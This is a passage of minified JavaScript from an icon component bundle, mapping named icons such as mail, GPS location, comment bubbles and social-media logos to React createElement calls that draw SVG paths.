24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 1v-1"})),messege_comment_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 